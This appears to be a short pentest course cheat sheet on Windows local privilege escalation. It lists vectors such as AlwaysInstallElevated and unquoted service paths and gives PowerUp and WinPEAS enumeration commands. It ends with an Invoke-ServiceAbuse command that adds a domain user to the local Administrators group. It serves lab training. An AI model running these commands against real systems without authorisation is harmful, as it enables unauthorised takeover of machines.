Local Privilege Escalation
Vectors
There are various ways of locally escalating privileges on Windows box:
Missing patches โ Automated deployment and AutoLogon passwords in clear text
AlwaysInstallElevated (Any user can run MSI as SYSTEM)
Misconfigured Services โ DLL Hijacking and more
NTLM Relaying a.k.a. Won't Fix
This guide offer a sufficiently comprehensive overview of the course material for local privilege escalation
Tools
PowerUp
WinPEAS
Privesc
Automated checks
# PowerUp
Invoke-AllChecks
# winPEAS
winPEASx64.exe
# Privesc
Invoke-PrivEsc
Services
Find vulnerable service configuration
# Get services with unquoted paths and spaces
Get-ServiceUnquoted -Verbose
# Get services where current user can write to binary path
Get-ModifiableServiceFile -Verbose
# Get the services whose configuration current user can modify
Get-ModifiableService -Verbose
Add domain user to the local Administrators group
Invoke-ServiceAbuse -Name 'AbyssWebServer' -UserName 'dcorp\studentx' -Verbose
Last updated
Was this helpful?